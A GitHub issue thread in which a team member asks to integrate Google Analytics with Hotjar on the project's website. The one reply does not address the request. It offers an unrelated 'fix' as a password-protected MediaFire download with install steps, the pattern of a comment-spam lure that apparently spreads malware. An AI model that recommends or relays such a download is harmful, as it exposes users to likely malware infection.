### ISSUE TITLE
integrate Google Analytics to Hotjar 

### ISSUE THREAD

**Issue by bellelala** [AElf-devops/aelf-website-next#113]
Currently our website connection is via google tag manager. We will need a google analytics connection in order to integrate with Hotjar - https://help.hotjar.com/hc/en-us/articles/8547713037719-Google-Analytics-Integration 

We need this integration in order to better track the UX flow. As the Hotjar only has 13 days of free trial left, please prioritise to finish this integration by this week if possible so we can capture more data.

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
